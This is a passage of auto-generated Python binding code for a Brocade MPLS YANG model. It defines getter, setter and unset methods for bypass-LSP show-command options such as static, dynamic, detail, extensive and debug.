Setter method for bypass_lsp_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name() directly.
YANG Description: Show one bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name(self):
self.__bypass_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_name_extensive(self):
"""
Getter method for bypass_lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_extensive (boolean)
YANG Description: Show one bypass-lsp extensive info by name
"""
return self.__bypass_lsp_name_extensive
def _set_bypass_lsp_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name_extensive() directly.
YANG Description: Show one bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name_extensive(self):
self.__bypass_lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_name_debug(self):
"""
Getter method for bypass_lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_debug (boolean)
YANG Description: Show one bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_name_debug
def _set_bypass_lsp_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_name_debug() directly.
YANG Description: Show one bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_name_debug(self):
self.__bypass_lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-debug", rest_name="bypass-lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static(self):
"""
Getter method for bypass_lsp_static, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static (string)
YANG Description: Show all static bypass-lsps in brief
"""
return self.__bypass_lsp_static
def _set_bypass_lsp_static(self, v, load=False):
"""
Setter method for bypass_lsp_static, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static() directly.
YANG Description: Show all static bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_static = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static(self):
self.__bypass_lsp_static = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_static_wide(self):
"""
Getter method for bypass_lsp_static_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_wide (boolean)
YANG Description: Show all static bypass-lsps in brief and wide
"""
return self.__bypass_lsp_static_wide
def _set_bypass_lsp_static_wide(self, v, load=False):
"""
Setter method for bypass_lsp_static_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_wide() directly.
YANG Description: Show all static bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_wide(self):
self.__bypass_lsp_static_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_detail(self):
"""
Getter method for bypass_lsp_static_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_detail (boolean)
YANG Description: Show all static bypass-lsps in detail
"""
return self.__bypass_lsp_static_detail
def _set_bypass_lsp_static_detail(self, v, load=False):
"""
Setter method for bypass_lsp_static_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_detail() directly.
YANG Description: Show all static bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_detail(self):
self.__bypass_lsp_static_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_extensive(self):
"""
Getter method for bypass_lsp_static_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_extensive (boolean)
YANG Description: Show all static bypass-lsps in extensive
"""
return self.__bypass_lsp_static_extensive
def _set_bypass_lsp_static_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_static_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_extensive() directly.
YANG Description: Show all static bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_extensive(self):
self.__bypass_lsp_static_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_debug(self):
"""
Getter method for bypass_lsp_static_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_debug (boolean)
YANG Description: Show all static bypass-lsps in extensive debug
"""
return self.__bypass_lsp_static_debug
def _set_bypass_lsp_static_debug(self, v, load=False):
"""
Setter method for bypass_lsp_static_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_debug() directly.
YANG Description: Show all static bypass-lsps in extensive debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_debug(self):
self.__bypass_lsp_static_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-debug", rest_name="bypass-lsp-static-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_name(self):
"""
Getter method for bypass_lsp_static_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name (string)
YANG Description: Show one static bypass-lsp detailed info by name
"""
return self.__bypass_lsp_static_name
def _set_bypass_lsp_static_name(self, v, load=False):
"""
Setter method for bypass_lsp_static_name, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_name() directly.
YANG Description: Show one static bypass-lsp detailed info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_static_name = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name(self):
self.__bypass_lsp_static_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_static_name_extensive(self):
"""
Getter method for bypass_lsp_static_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_extensive (boolean)
YANG Description: Show one static bypass-lsp extensive info by name
"""
return self.__bypass_lsp_static_name_extensive
def _set_bypass_lsp_static_name_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_static_name_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_name_extensive() directly.
YANG Description: Show one static bypass-lsp extensive info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_name_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name_extensive(self):
self.__bypass_lsp_static_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_static_name_debug(self):
"""
Getter method for bypass_lsp_static_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_debug (boolean)
YANG Description: Show one static bypass-lsp extensive debug info by name
"""
return self.__bypass_lsp_static_name_debug
def _set_bypass_lsp_static_name_debug(self, v, load=False):
"""
Setter method for bypass_lsp_static_name_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_static_name_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_static_name_debug is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_static_name_debug() directly.
YANG Description: Show one static bypass-lsp extensive debug info by name
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_static_name_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_static_name_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_static_name_debug(self):
self.__bypass_lsp_static_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-debug", rest_name="bypass-lsp-static-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic(self):
"""
Getter method for bypass_lsp_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic (string)
YANG Description: Show all dynamic bypass-lsps in brief
"""
return self.__bypass_lsp_dynamic
def _set_bypass_lsp_dynamic(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic() directly.
YANG Description: Show all dynamic bypass-lsps in brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__bypass_lsp_dynamic = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic(self):
self.__bypass_lsp_dynamic = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic", rest_name="bypass-lsp-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_bypass_lsp_dynamic_wide(self):
"""
Getter method for bypass_lsp_dynamic_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_wide (boolean)
YANG Description: Show all dynamic bypass-lsps in brief and wide
"""
return self.__bypass_lsp_dynamic_wide
def _set_bypass_lsp_dynamic_wide(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_wide is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_wide() directly.
YANG Description: Show all dynamic bypass-lsps in brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_wide(self):
self.__bypass_lsp_dynamic_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_detail(self):
"""
Getter method for bypass_lsp_dynamic_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_detail (boolean)
YANG Description: Show all dynamic bypass-lsps in detail
"""
return self.__bypass_lsp_dynamic_detail
def _set_bypass_lsp_dynamic_detail(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_detail is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_detail() directly.
YANG Description: Show all dynamic bypass-lsps in detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_bypass_lsp_dynamic_detail(self):
self.__bypass_lsp_dynamic_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_bypass_lsp_dynamic_extensive(self):
"""
Getter method for bypass_lsp_dynamic_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_extensive (boolean)
YANG Description: Show all dynamic bypass-lsps in extensive
"""
return self.__bypass_lsp_dynamic_extensive
def _set_bypass_lsp_dynamic_extensive(self, v, load=False):
"""
Setter method for bypass_lsp_dynamic_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/bypass_lsp_dynamic_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_bypass_lsp_dynamic_extensive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bypass_lsp_dynamic_extensive() directly.
YANG Description: Show all dynamic bypass-lsps in extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bypass_lsp_dynamic_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__bypass_lsp_dynamic_extensive = t
